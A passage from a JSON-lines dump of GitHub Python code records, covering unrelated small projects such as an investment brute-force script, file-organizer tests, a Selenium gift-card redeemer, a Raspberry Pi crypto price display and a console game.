_calc_expert_losses(self, offline_results):\n \"\"\"\n offline_results = #frames X 4\n \"\"\"\n\n expert_gradient_losses = np.zeros((self.n_experts, len(offline_results)))\n\n for i in range(self.n_experts):\n expert_results = self.prev_boxes[:, i, :]\n expert_gradient_losses[i] = 1 - calc_overlap(\n expert_results, offline_results\n )\n\n return expert_gradient_losses\n","repo_name":"songheony/A3T","sub_path":"algorithms/aaa.py","file_name":"aaa.py","file_ext":"py","file_size_in_byte":4204,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"22"} +{"seq_id":"26988560669","text":"import math\nimport time\n\n\nif __name__==\"__main__\":\n start = time.time()\n max = 100\n d = []\n count = 0\n for a in range(2, max + 1):\n for b in range(2, max + 1):\n n = math.pow(a, b)\n if n not in d:\n #d.append(n)\n count += 1\n print(\"numbers count = {}\".format(count))\n end = time.time()\n print(\"Completed in {0:.2}s\".format(end - start))","repo_name":"chanchs/euler","sub_path":"problems/problem-29.py","file_name":"problem-29.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"12909485169","text":"\"\"\"Votre algorithme doit suggérer une liste des actions les plus rentables que nous devrions \nacheter pour maximiser le profit d'un client au bout de deux ans.\"\"\"\n\n\"\"\"Nous avons les contraintes suivantes :\n-Chaque action ne peut être achetée qu'une seule fois.\n-Nous ne pouvons pas acheter une fraction d'action.\n-Nous pouvons dépenser au maximum 500 euros par client.\n\nParce que nous voulons être aussi transparents que possible pour nos clients, nous voulons que le \nprogramme essaie toutes les différentes combinaisons d'actions qui correspondent \nà nos contraintes, et choisisse le meilleur résultat. \nLe programme doit donc lire un fichier contenant des informations sur les actions, explorer toutes \nles combinaisons possibles et afficher le meilleur investissement.\n\"\"\"\n\nimport csv\nfrom time import time\n\nMAXIMUM_EXPENDITURE = 500\n\navailable_money = MAXIMUM_EXPENDITURE\n\nactions_parameters = {} # will contain all actions and their relative information \naction_prices = [] # --> tuple? is more adapted ? ; will be used to limit purchasing\n\n# all_investment_possibilities will contain all tables corresponding to a possibility of investment\nall_investment_possibilities = []\nfirst_investment_possibility = [] # will contain a possibility of investment\nall_investment_possibilities.append(first_investment_possibility)\n\nbest_investment_actions = \"unknown\"\nbest_investment_cost = \"unknown\"\nbest_investment_benefit = \"unknown\"\n\nall_investment_possibilities_which_respect_maximum_expenditure = []\n\n\ndef getActionParametersFromACsvFile(csvFileName):\n \"\"\"Opens a CSV file and gets parameters and prices of actions\"\"\"\n # CSV package ; method DictReader() : Cette méthode sait que la première ligne est un en-tête et \n # sauvegarde les autres lignes en tant que dictionnaires. Chaque clé est un nom de colonne et la \n # valeur est la valeur de la colonne\n\n with open(csvFileName) as csv_file:\n reader = csv.DictReader(csv_file, delimiter=',')\n for line in reader:\n # actions_parameters filling\n action_cost = int(line['Cout_par_action_(en_euros)'])\n action_benefit_percent = float(line['Bénéfice_(après_2_ans)'])/100 # 7% is noted 7 in the table, as in client data\n action_benefit_euros = action_cost * action_benefit_percent\n actions_parameters[line['Action-#']] = [action_cost, action_benefit_euros]\n\n # actions_prices filling\n action_prices.append(int(line['Cout_par_action_(en_euros)']))\n\n # print(actions_parameters[\"Action-1\"])\n\n\ndef getAListOfActionsKeys():\n \"\"\"Returns a list of actions keys corresponding to actions_parameters dictionnary\"\"\"\n\n keys_list = []\n for key in actions_parameters:\n keys_list.append(key)\n return keys_list\n\n\ndef define_all_investment_possibilities(all_investment_possibilities, actions_parameters,\n keys_list):\n \"\"\"Defines all investment possibilities (brute force algorithm)\"\"\"\n\n # For each action: 2 possibilities: \n # 1.Do not buy it ; 2.Buy it if its price is <= available_money, \n # Stop paramater for recursivity ? While available_money >= lowest action price \n\n # Logique choisie: \n # pour chaque action : je l'achette ou je ne l'achette pas : \n # turn 1 : [\"\"],[A]\n # turn 2 : [\"\", \"\"], [\"\", B],[A, \"\"],[A, B]\n\n # https://fr.acervolima.com/copie-de-tableaux-en-python/\n # I need to copy ('copie profonde') the tables \n\n # Recursivity\n #mafonction(param1, param2):\n # début\n # si condition faire\n # retourner calcul\n # sinon faire\n # mafonction(param1, param2)\n # retourner quelque-chose\n # fin condition faire\n # fin\n #fin ma fonction\n\n all_investment_possibilities_copy_for_a_loop = all_investment_possibilities.copy()\n # for computer memory : [action-3] is not interesting if we got [0,0,3,0,0,0,0,0,0,0,0,...]\n all_investment_possibilities.clear()\n\n for table_of_possibilities in all_investment_possibilities_copy_for_a_loop:\n \n if len(keys_list) == 0: \n break\n\n elif len(keys_list) > 0:\n\n #Make a copy and do not buy the action\n table_of_possibilities_copy_without_buying = table_of_possibilities.copy()\n table_of_possibilities_copy_without_buying.append([0,0])\n all_investment_possibilities.append(table_of_possibilities_copy_without_buying)\n\n #Make a copy and buy the action from actions_parameters\n table_of_possibilities_copy_with_buying = table_of_possibilities.copy()\n table_of_possibilities_copy_with_buying.append(actions_parameters[keys_list[0]]) \n all_investment_possibilities.append(table_of_possibilities_copy_with_buying)\n\n keys_list.pop(0)\n\n\ndef calculatingCostAndBenefitOfEachInvestment(all_investment_possibilities):\n for investment_possibility in all_investment_possibilities:\n # print(investment_possibility)\n # >>> #[0, 0, [0, 0], [30, 0.1], [50, 0.15], [70, 0.2], [0, 0], [0, 0], [22, 0.07], ...\n totalInvestmentCost = 0\n totalInvestmentBenefit = 0\n\n for action in investment_possibility:\n # Cost\n action_cost = action[0]\n totalInvestmentCost += action_cost\n # Benefit\n action_benefit = action[1]\n totalInvestmentBenefit += action_benefit\n\n # Keep only investment which respond to expenditure criteria\n if totalInvestmentCost <= MAXIMUM_EXPENDITURE:\n # print(\"totalInvestmentCost \",totalInvestmentCost)\n investment_possibility.append(totalInvestmentCost)\n investment_possibility.append(totalInvestmentBenefit)\n all_investment_possibilities_which_respect_maximum_expenditure.append(\n investment_possibility)\n\n\ndef comparing_each_investment_which_respect_maximum_expenditure(best_investment_actions, \n best_investment_cost, \n best_investment_benefit):\n # highest_investment_benefit initialisation\n highest_investment_benefit = 0\n\n for investment in all_investment_possibilities_which_respect_maximum_expenditure:\n if investment[-1] > highest_investment_benefit :\n highest_investment_benefit = investment[-1] \n best_investment_actions = investment[:-2]\n best_investment_cost = investment[-2]\n best_investment_benefit = investment[-1]\n return best_investment_actions, best_investment_cost, best_investment_benefit \n\n\ndef display_best_investiment(best_investment_information):\n \"\"\"Displays the best investiment\"\"\"\n\n best_investment_actions = best_investment_information[0]\n best_investment_cost = best_investment_information[1]\n best_investment_benefit = best_investment_information[2]\n\n print(\"The BEST INVESTMENT\")\n print(\"List of actions to buy \", best_investment_actions)\n print(\"Total cost of the investment: \", best_investment_cost)\n print(\"Total benefit of the investment: \", best_investment_benefit)\n\n\ndef main():\n start_total_time = time()\n getActionParametersFromACsvFile('part1_actions.csv')\n keys_list = getAListOfActionsKeys()\n\n start_define_all_investment_possibilities_time = time()\n for i in range(len(actions_parameters)):\n print(i)\n define_all_investment_possibilities(all_investment_possibilities, actions_parameters, \n keys_list)\n #for investment in all_investment_possibilities:\n # print(investment)\n end_define_all_investment_possibilities_time = time()\n\n start_calculatingCostAndBenefitOfEachInvestment_time = time()\n calculatingCostAndBenefitOfEachInvestment(all_investment_possibilities)\n end_calculatingCostAndBenefitOfEachInvestment_time = time()\n\n best_investment_information = comparing_each_investment_which_respect_maximum_expenditure(\n best_investment_actions, best_investment_cost, best_investment_benefit)\n display_best_investiment(best_investment_information)\n end_total_time = time()\n\n\n spent_total_time = end_total_time - start_total_time\n spent_define_all_investment_possibilities_time = end_define_all_investment_possibilities_time - start_define_all_investment_possibilities_time\n spent_calculatingCostAndBenefitOfEachInvestment_time = end_calculatingCostAndBenefitOfEachInvestment_time - start_calculatingCostAndBenefitOfEachInvestment_time\n\n print(\"spent_total_time (includes opening file, etc):\", spent_total_time)\n print(\"spent_define_all_investment_possibilities_time:\", spent_define_all_investment_possibilities_time)\n print(\"spent_calculatingCostAndBenefitOfEachInvestment_time:\", spent_calculatingCostAndBenefitOfEachInvestment_time)\n\n\nmain()\n\n","repo_name":"ThomasCreusot/OpenClassRooms_Project7","sub_path":"bruteforce.py","file_name":"bruteforce.py","file_ext":"py","file_size_in_byte":8922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"19729783968","text":"\"\"\" Testing the OrganizeDirectory class and its OrganizeDesktop child class. \"\"\"\nimport os\nfrom pathlib import Path\nfrom definitions import Definitions\n\n\ndef test_file_creation(org_dir) -> None:\n \"\"\" Testing the file creation functionality. \"\"\"\n # Create the Desktop & Documents directories if they don't exist. This will be the og_path.\n if not os.path.exists(Definitions.DESKTOP_PATH) or not os.path.exists(Definitions.DOCUMENTS_PATH):\n Path(Definitions.DESKTOP_PATH).mkdir(exist_ok=True)\n Path(Definitions.DOCUMENTS_PATH).mkdir(exist_ok=True)\n\n # change CWD to the desktop.\n os.chdir(org_dir._og_path)\n assert os.getcwd() == Definitions.DESKTOP_PATH\n\n # create some files.\n f1 = os.path.join(org_dir._og_path, \"img.png\")\n open(f1, 'a').close()\n f2 = os.path.join(org_dir._og_path, \"video.mp4\")\n open(f2, 'a').close()\n f3 = os.path.join(org_dir._og_path, \"audio.mp3\")\n open(f3, 'a').close()\n f4 = os.path.join(org_dir._og_path, \"pokemon.gba\")\n open(f4, 'a').close()\n\n # assert they were created, test _files().\n file_set = {\"img.png\", \"video.mp4\", \"audio.mp3\", \"pokemon.gba\"}\n file_list: list[Path] = []\n\n for file in os.listdir():\n if file[0] == \".\":\n continue\n if file in file_set:\n file_set.remove(file)\n file_list.append(Path(file))\n\n assert not file_set\n assert org_dir._files() == file_list\n\n # delete created files.\n for file in file_list:\n os.remove(file)\n\n\ndef test_folder_functionality(org_dir) -> None:\n \"\"\" Testing the folder creation and empty folder removal functionality. \"\"\"\n # change the CWD to the destination path.\n os.chdir(org_dir._final_path)\n assert os.getcwd() == Definitions.DOCUMENTS_PATH\n\n # test documents folder creation.\n org_dir._folders[\"rod_formats\"] = \"rods\" # this should not be created.\n org_dir._create_folders()\n\n folder_set = {\"audios\", \"videos\", \"images\", \"roms\", \"rods\"}\n for file in os.listdir():\n folder = Path(file)\n if folder.is_dir() and folder.name in folder_set:\n folder_set.remove(folder.name)\n\n assert len(folder_set) == 1 and \"rods\" in folder_set\n\n # test empty folder removal.\n org_dir._rm_empty_folders()\n assert os.getcwd() == org_dir._final_path\n non_existent_folders = [\"audios\", \"videos\", \"images\", \"roms\"]\n\n folder_set = set()\n for file in os.listdir():\n folder = Path(file)\n if folder.is_dir():\n folder_set.add(folder.name)\n\n for item in non_existent_folders:\n assert item not in folder_set\n\n\ndef test_move_files(org_dir) -> None:\n \"\"\" Testing the file moving functionality. Very important for organization. \"\"\"\n # add an extension to org_dir that isn't tied to a folder.\n org_dir._formats.formats[\"fake_format\"].add(\".mp5\")\n assert \".mp5\" in org_dir._formats.formats[\"fake_format\"]\n\n # change CWD to the desktop, create fake mp5 video file.\n os.chdir(org_dir._og_path)\n assert os.getcwd() == Definitions.DESKTOP_PATH\n\n # create files for moving.\n ext_set = set() # will use later to assert file creation.\n\n for f_type in org_dir._formats.formats:\n file_name = f_type.split(\"_\")[0] # audio, video, image, rom w/ each of their ext\n for f_ext in org_dir._formats.formats[f_type]:\n # populate the ext_set\n ext_set.add(f_ext)\n # file creation\n cur_file = os.path.join(org_dir._og_path, file_name + f_ext)\n open(cur_file, 'a').close()\n\n # assert that the files were created.\n assert ext_set\n file_list = [] # these files will be moved later.\n\n for item in os.listdir():\n file = Path(item)\n if not file.suffixes:\n continue\n\n file_list.append(file)\n\n cur_ext = \"\".join(file.suffixes)\n if cur_ext in ext_set:\n ext_set.remove(cur_ext)\n\n assert not ext_set\n\n # create folders, move the files, delete empty folders\n org_dir._create_folders()\n org_dir._move_files(file_list)\n\n os.chdir(org_dir._final_path)\n Path(\"test_dir\").mkdir(exist_ok=True) # this should be deleted.\n org_dir._rm_empty_folders()\n\n # assert that the folders exist.\n folder_set = set()\n for item in os.listdir():\n folder = Path(item)\n if folder.is_dir():\n folder_set.add(folder.name)\n\n assert \"test_dir\" not in folder_set\n assert \"audios\" in folder_set and \"images\" in folder_set and \"roms\" in folder_set and \"videos\" in folder_set\n\n # ensure that files were moved part 1. check the og_path.\n os.chdir(org_dir._og_path)\n\n file_set = set(file_list)\n for item in os.listdir():\n file = Path(item)\n if file.is_dir() or not file.suffixes:\n continue\n else:\n assert file.name not in file_set\n\n # ensure that files were moved part 2. check the final_path.\n os.chdir(org_dir._final_path)\n\n assert os.path.exists(f\"{org_dir._final_path}/fake.mp5\")\n os.remove(f\"{org_dir._final_path}/fake.mp5\")\n\n for file_type in org_dir._folders:\n os.chdir(org_dir._final_path + \"/\" + org_dir._folders[file_type])\n for item in os.listdir():\n file = Path(item)\n if file in file_set:\n os.remove(file)\n file_set.remove(file)\n\n assert file_set.pop().name == \"fake.mp5\"\n assert not file_set\n\n # end, delete all files from created folders.\n org_dir._rm_empty_folders()\n","repo_name":"rod608/fileorg_oop_docker","sub_path":"tests/test_organize.py","file_name":"test_organize.py","file_ext":"py","file_size_in_byte":5483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"70056411257","text":"import os\nimport json\nfrom selenium import webdriver\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.chrome.options import Options\n\n## CONSTANT\nURL = 'https://www.amazon.com/'\nFILE = os.path.join(os.getcwd(),'LOGIN.json')\n# DRIVER_PATH = os.path.join('edgedriver_linux64','msedgedriver')\nDRIVER_PATH = os.path.join('utility','edgedriver_win64','msedgedriver.exe')\n\n\n## public method\n# LOGIN.json contains the passward and email for amazon account.\ndef login_info():\n with open(FILE,'r') as f:\n info = json.load(f)\n return info['email'] , info['passward'] # email , passward\n\n## Obj class\nclass AutoAmaz(object):\n\n def __init__ (self):\n self.driver = webdriver.Edge(DRIVER_PATH)\n self.wait = WebDriverWait(self.driver,500)\n self.driver.implicitly_wait(10)\n self.driver.get(URL)\n\n # activate the log-in page\n self.wait.until(\n EC.presence_of_element_located((By.XPATH,'//*[@id=\"nav-link-accountList\"]/span'))).click()\n self.login_page()\n\n # navigate to \"Your Account\"\n self.driver.find_element(By.XPATH,'//*[@id=\"nav-link-accountList\"]/span').click()\n\n # navigate to Gift cards page\n self.driver.find_element(By.PARTIAL_LINK_TEXT,\"balance\").click()\n # Then, redeem\n self.driver.find_element(By.LINK_TEXT,\"Redeem a Gift Card\").click()\n # once we get the code, paste on the Entry bar.\n # and Click \"Apply\"\n\n # When 'id = alertRedemptionSuccess' appear, clip 'class = a-alert-heading'\n # and driver.save_screenshot()\n # element = self.wait.until(EC.presence_of_elements_located((By.ID,'gc-redemption-form-heading')))\n\n\n def _is_read(self):\n try:\n element = self.wait.until(EC.presence_of_elements_located((By.ID,'gc-redemption-form-heading')))\n \n except NoSuchElementException:\n \n return False\n\n return True\n\n def login_page(self):\n # we need to deal with the situation\n # once we naviated to login-page\n # determine if it is login-page.\n # then, just login again.\n try:\n self.driver.find_element(By.CLASS_NAME,\"a-spacing-small\")\n\n ## prepare the login info\n email, pswd = login_info()\n\n ## navigate to login page...s\n ## on the login page, first is the accound name, email\n\n self.driver.find_element(By.ID , 'ap_email').send_keys(email,Keys.RETURN)\n\n ## on the passward, then enter the passward.\n self.driver.find_element(By.ID , 'ap_password').send_keys(pswd,Keys.RETURN)\n ## ...Now, we are successfully login to one account.\n except NoSuchElementException:\n print(\"We are not at login-page.\")\n\n return None\n def redeem_gift_card(self,code,PATH = None):\n '''\n while we are on the redeem-gift-card page; locate the claim_code field, paste\n the code on the input-field. The page might be not so stable will need to login again.\n Once exceptions occurs, attaim to login.\n '''\n try:\n if self.driver.find_element(By.ID,'gc-redemption-apply-button').is_enabled():\n claim_code = self.driver.find_element(By.NAME,'claimCode')\n claim_code.clear() # clean the last time entied\n # paste the code on the redemption-input, and apply.\n claim_code.send_keys(code)\n #claim_code.send_keys(Keys.ENTER)\n\n # When 'id = alertRedemptionSuccess' appear, clip 'class = a-alert-heading'\n # and driver.save_screenshot()\n except NoSuchElementException:\n # once we cannot locate the element, might be it have navigate to login-page again,\n # then, apply login_page().\n self.login_page()\n\n finally:\n ## what ever that happen, take a screenshop.\n file_path_name = os.path.join(PATH,f'{code}.png')\n self.driver.save_screenshot(file_path_name)\n\nif __name__ == '__main__':\n test = AutoAmaz()\n","repo_name":"Deamerrong123/AutoAmz","sub_path":"AutoAmaz.py","file_name":"AutoAmaz.py","file_ext":"py","file_size_in_byte":4401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"3469019027","text":"import random\nimport time\n\ndef rouletteIntro():\n name = input(\"Hello there brave one! What is your name?\\n \")\n print(\"You are about to play Russian Roulette!\")\n time.sleep(1)\n print(\"Your goal is to get the highest amount of blank shots without dying!\")\n print(\"So if you get all 7 blanks, you win!\")\n time.sleep(1)\n print(\"So \" + name + \". let the games begin..\")\n\n bulletChamber = random.randint(1,8)\n\n return bulletChamber\n\ndef pickChamber(loadedChamber):\n dead = 0\n chosenChambers = set()\n\n while dead == 0:\n chamberCount = len(chosenChambers)\n chambersLeft = 8 - chamberCount\n chambersLeft = str(chambersLeft)\n score = str(chamberCount)\n print(\"There are \" + chambersLeft + \" chambers left.\")\n\n\n if chamberCount == 7:\n print(\"Congratulations! Your prize is..\")\n time.sleep(3)\n print(\"BANG!\")\n time.sleep(2)\n print(\"You've survived \" + score + \" shots.\")\n shot = 1\n\n else:\n chamber = input(\"Pick a chamber from 1 - 8.\\n\")\n chamber = int(chamber)\n\n if chamber < 1 or chamber > 8:\n print(\"Fuck off.\")\n\n elif chamber == loadedChamber:\n print(\"...\")\n time.sleep(3)\n print(\"BANG!\")\n time.sleep(2)\n print(\"You've survived \" + score + \" shots.\")\n dead = 1\n\n elif chamber != loadedChamber:\n print(\"...\")\n time.sleep(5)\n print(\"'click'\")\n chosenChambers.add(chamber)\n\n\n\nplay = \"y\"\nwhile play == \"y\" or play == \"Y\":\n\n chamber = rouletteIntro()\n\n pickChamber(chamber)\n\n play = input(\"Would you like to play again?(y/n)\\n\")\n","repo_name":"QuiEgo/Russian-Roulette","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"11468514121","text":"#!/usr/bin/env python3\n\"\"\" This module contains the function pool_forward. \"\"\"\nimport numpy as np\n\n\ndef pool_forward(A_prev, kernel_shape, stride=(1, 1), mode='max'):\n \"\"\"\n Performs forward propagation over a pooling layer of a neural network.\n A_prev is a numpy.ndarray of shape (m, h_prev, w_prev, c_prev) containing\n the output of the previous layer.\n m is the number of examples.\n h_prev is the height of the previous layer.\n w_prev is the width of the previous layer.\n c_prev is the number of channels in the previous layer.\n kernel_shape is a tuple of (kh, kw) containing the size of the kernel for\n the pooling.\n kh is the kernel height.\n kw is the kernel width.\n stride is a tuple of (sh, sw) containing the strides for the pooling.\n sh is the stride for the height.\n sw is the stride for the width.\n mode is a string containing either max or avg, indicating whether to\n perform maximum or average pooling, respectively.\n Returns: the output of the pooling layer.\n \"\"\"\n kh, kw = kernel_shape\n m, h_prev, w_prev, c_prev = A_prev.shape\n sh, sw = stride\n if mode == 'max':\n pool = np.max\n else:\n pool = np.average\n ansh = int((h_prev - kh) / sh + 1)\n answ = int((w_prev - kw) / sw + 1)\n ans = np.zeros((m, ansh, answ, c_prev))\n for i in range(ansh):\n for j in range(answ):\n x = i * sh\n y = j * sw\n ans[:, i, j, :] = pool(A_prev[:, x: x + kh, y: y + kw, :],\n axis=(1, 2))\n return ans\n","repo_name":"Daransoto/holbertonschool-machine_learning","sub_path":"supervised_learning/0x07-cnn/1-pool_forward.py","file_name":"1-pool_forward.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"23233769904","text":"import mimetypes\nimport subprocess\nfrom pathlib import Path\n\nfrom sweeper.app.common.types import MIME, UndefinedMimeType\nfrom sweeper.infrastructure.system_logger import logger\n\n\nclass MimeTyper:\n def from_file(self, source_file_path: Path) -> MIME:\n # mime_type, _ = mimetypes.guess_type(source_file_path.as_posix())\n mime_type = subprocess.run(\n [\"file\", \"-b\", \"--mime-type\", source_file_path.as_posix()], capture_output=True\n ).stdout.decode()\n major_mime = UndefinedMimeType\n\n if mime_type:\n try:\n major_mime = self._get_major_mimetype(mime_type)\n except Exception as ex:\n logger.error(ex, source_file_path)\n\n return major_mime\n\n def _get_major_mimetype(self, stdout: str) -> MIME:\n \"\"\"Разделение полученного результат от команды `file` на основной тип и подтип. Возрвщаем основной тип.\n\n :param stdout: Результат выполнения команды `file`\n \"\"\"\n major_type, subtype = stdout.split(\"/\", maxsplit=1)\n\n return MIME(major_type)\n","repo_name":"kolesnikov-bn/sweeper","sub_path":"sweeper/app/common/utils/mime_typer.py","file_name":"mime_typer.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"72682536375","text":"# **********************************************************************************************************\n# Crypto Tracker\n# by @cloudchamber4\n# 24 April 2021\n# **********************************************************************************************************\n# Hardware Used (~$25 USD): \n#\n# Raspberry Pi Zero W: \n# ( https://www.raspberrypi.org/products/raspberry-pi-zero-w/ )\n#\n# Adafruit Mini PiTFT 135x240 Color Display \n# ( https://shop.pimoroni.com/products/adafruit-mini-pitft-135x240-color-tft-add-on-for-raspberry-pi )\n# \n# **********************************************************************************************************\n# RPI Configuration Steps:\n#\n# Lots of tutorials out there far better than mine, but below are the key steps\n#\n# \t(Use raspi-config GUI to Enable the SPI Interface)\n#\tsudo raspi-config \n#\n# \t(Add two key libraries...)\n#\tgit clone https://github.com/adafruit/Adafruit_CircuitPython_Bundle.git\n#\tgit clone https://github.com/adafruit/circuitpython.git\n#\t\n# \t(From )\n# \tsudo apt-install ntp\n#\tsudo systemctl status ntp\n#\t \n# \t(Install Python 3)\n#\tsudo apt-get install python3-pip\n#\tcd Adafruit_CircuitPython_Bundle/\n#\t\n# \t(This next step takes ~33 minutes!)\n#\tsudo ./update-submodules.sh \n#\tcd ..\n#\t\n# \t(See Adafruit RGB Display Library Documentation)\n# \t( https://buildmedia.readthedocs.org/media/pdf/adafruit-circuitpython-rgb-display/latest/adafruit-circuitpython-rgb-display.pdf)\n# \tsudo pip3 install adafruit-circuitpython-rgb-display\n#\t \n# \t(DejaVu Font family based on the Vera Fonts)\n#\tsudo apt-get install ttf-dejavu\n#\t\n#\t(PIL is the Python Imaging Library) \n#\tsudo apt-get install python3-pil\n#\t\n# \t(Python Numpy Library)\n#\tsudo apt-get install python3-numpy\n# **********************************************************************************************************\n#\t \n# Copy this document over to your RPI via Putty PSFTP ( https://www.puttygen.com/psftp )\n#\t\n#\t1.) (Obtain IP address of RPI) \n#\t ifconfig\n#\t2.) (Open PSFTP on laptop)\n#\t3.) (Open the connection between your computer and your RPI)\n#\t open 192.168.1.39\n#\t4.) (Point to your local directory where this file is saved)\n#\t lcd c:/fromRPI\n#\t5.) copy this file to your RPI\n#\t put vet-track.py\n# 6.) (Make the python file executable)\n# Sudo chmod +x vet-track.py\n# 7.) (Make this python file run at every reboot automatically)\t\n# sudo nano /etc/rc.local\n# (add the below line of code to your rc.local file...)\n# sudo python3 /home/pi/stats_time.py &\n# **********************************************************************************************************\n#Code below:\nimport time\nimport subprocess\nimport digitalio\nimport board\nfrom PIL import Image, ImageDraw, ImageFont\nimport adafruit_rgb_display.st7789 as st7789\nimport json\nimport cfscrape\n\n# Configuration for CS and DC pins (these are FeatherWing defaults on M0/M4):\ncs_pin = digitalio.DigitalInOut(board.CE0)\ndc_pin = digitalio.DigitalInOut(board.D25)\nreset_pin = None\n\n# Config for display baudrate (default max is 24mhz):\nBAUDRATE = 64000000\n\n# Setup SPI bus using hardware SPI:\nspi = board.SPI()\n\n# Create the ST7789 display:\ndisp = st7789.ST7789(spi, cs=cs_pin, dc=dc_pin, rst=reset_pin, baudrate=BAUDRATE,\nwidth=135, height=240, x_offset=53, y_offset=40)\n\n# Create blank image for drawing.\n# Make sure to create image with mode 'RGB' for full color.\nheight = disp.width # we swap height/width to rotate it to landscape!\nwidth = disp.height\nimage = Image.new('RGB', (width, height))\nrotation = 90\n\n# Get drawing object to draw on image.\ndraw = ImageDraw.Draw(image)\n\n# Draw a black filled box to clear the image.\ndraw.rectangle((0, 0, width, height), outline=0, fill=(0, 0, 0))\ndisp.image(image, rotation)\n\n# Draw some shapes.\n# First define some constants to allow easy resizing of shapes.\npadding = -2\ntop = padding\nbottom = height-padding\n\n# Move left to right keeping track of the current x position for drawing shapes.\nx = 0\n\n# Alternatively load a TTF font. Make sure the .ttf font file is in the\n# same directory as the python script!\n# Some other nice fonts to try: http://www.dafont.com/bitmap.php\nfont = ImageFont.truetype('/usr/share/fonts/truetype/dejavu/DejaVuSans.ttf', 24)\n\n# Turn on the backlight\nbacklight = digitalio.DigitalInOut(board.D22)\nbacklight.switch_to_output()\nbacklight.value = True\n\n#primary loop...\nwhile True:\n\t# Crypto Tracker\n\tscraper = cfscrape.create_scraper()\n\turl = 'https://api.cryptonator.com/api/ticker/vet-usd'\n\tcfurl = scraper.get(url).content\n\n\tdata = json.loads(cfurl)\n\n\tcoin = data['ticker']['base']\n\tcurrency = data['ticker']['target']\n\tprice = data['ticker']['price'][0:6] #First 4 decimal places\n\tvolume = data['ticker']['volume']\n\tchange = data['ticker']['change'][0:5]\n\tfloat_change = 100 * float(change)\n\tstring_change = str(float_change)\n\n\t# Draw a black filled box to clear the image.\n\tdraw.rectangle((0, 0, width, height), outline=0, fill=0)\n\n\t# Shell scripts for system monitoring from here:\n\t# https://unix.stackexchange.com/questions/119126/command-to-display-memory-usage-disk-usage-andcpu-load\n\n \t#1 TITLE:\n\tcmd = \"echo VeChain Tracker\"\n\tTitle = subprocess.check_output(cmd, shell=True).decode(\"utf-8\")\n\n\t#2 Time:\n\tcmd = \"date +%H:%M:%S | cut -d\\' \\' -f1\"\n\tTime = \"TIME: \"+subprocess.check_output(cmd, shell=True).decode(\"utf-8\")\n\n \t#3 Date:\n\tcmd = \"date -I | cut -d\\' \\' -f1\"\n\tDate = \"DATE: \"+subprocess.check_output(cmd, shell=True).decode(\"utf-8\")\n\n \t#4 COIN:\n\tcmd = \"echo coin\"\n\tCoin = \"COIN: \"+subprocess.check_output(cmd, shell=True).decode(\"utf-8\")\n\n \t#5 Price:\n\tPrice = \"VeChain: \" + price\n\n \t#6 % Change:\n\tChange = \"%Ch. 1-hr: \" + string_change + \"%\"\n\n\t# Write five lines of text.\n\ty = top\n\n\t#1st LINE:\n\t#TITLE\n\tdraw.text((x,y), Title, font=font, fill=\"#6495ED\") #CornFlowerBlue\n\ty += font.getsize(Title)[1]\n\n\t#2nd LINE:\n\t#DATE\n\tdraw.text((x, y), Date, font=font, fill=\"#FFFAFA\") #Snow White\n\ty += font.getsize(Date)[1]\n\n \t#3rd LINE:\n\t#TIME\n\tdraw.text((x, y), Time, font=font, fill=\"#FFFF00\") #Yellow\n\ty += font.getsize(Time)[1]\n\n\t#4th LINE\n\t#PRICE\n\tdraw.text((x, y), Price, font=font, fill=\"#00FA9A\") #Medium Spring Green\n\ty += font.getsize(Price)[1]\n\n\t#5th Price:\n\t#% CHANGE (past 1-hr)\n \t#Color Code %change, with \"+%\" = Green; \"-%\"=RED\n\tif float_change > 0:\n\t\tdraw.text((x, y), Change, font=font, fill=\"#00FF00\") #Lime Green\n\telse:\n\t\tdraw.text((x, y), Change, font=font, fill=\"#DC143C\") #Crimson\n\ty += font.getsize(Change)[1]\n\n\t# Display image.\n\tdisp.image(image, rotation)\n\n\t# Update every 500ms...\n\ttime.sleep(.5)\n","repo_name":"citius1974/vet-tracker","sub_path":"vet-track.py","file_name":"vet-track.py","file_ext":"py","file_size_in_byte":6691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"43364573028","text":"from turtle import Turtle\nfrom random import randint, choice\n\nCOLORS = [\"red\", \"orange\", \"yellow\", \"green\", \"blue\", \"purple\"]\nSTARTING_MOVE_DISTANCE = 5\nMOVE_INCREMENT = 10\n\n\nclass CarManager:\n\n def __init__(self):\n self.cars = [Turtle() for _ in range(15)]\n self.speed = STARTING_MOVE_DISTANCE\n self.spawn_cars()\n\n def spawn_cars(self):\n for car in self.cars:\n car.color(choice(COLORS))\n car.shape(\"square\")\n car.penup()\n car.shapesize(1, 2)\n car.goto(300 + randint(0, 300), randint(-260, 200))\n car.setheading(180)\n\n def move_cars(self):\n for car in self.cars:\n if car.xcor() < -320:\n car.goto(300 + randint(0, 200), randint(-260, 200))\n car.forward(self.speed)\n\n def increase_speed(self):\n self.speed += MOVE_INCREMENT\n\n\n","repo_name":"DachiB-git/turtle_crossing","sub_path":"car_manager.py","file_name":"car_manager.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"74965512696","text":"from flaskApp.backend.config import app,db,login_manager\nfrom flaskApp.backend.models.questionModel import Question\nfrom flaskApp.backend.models.userModel import User\nfrom flaskApp.backend.models.quizModel import Quiz\nfrom flaskApp.backend.models.userAnswerModel import 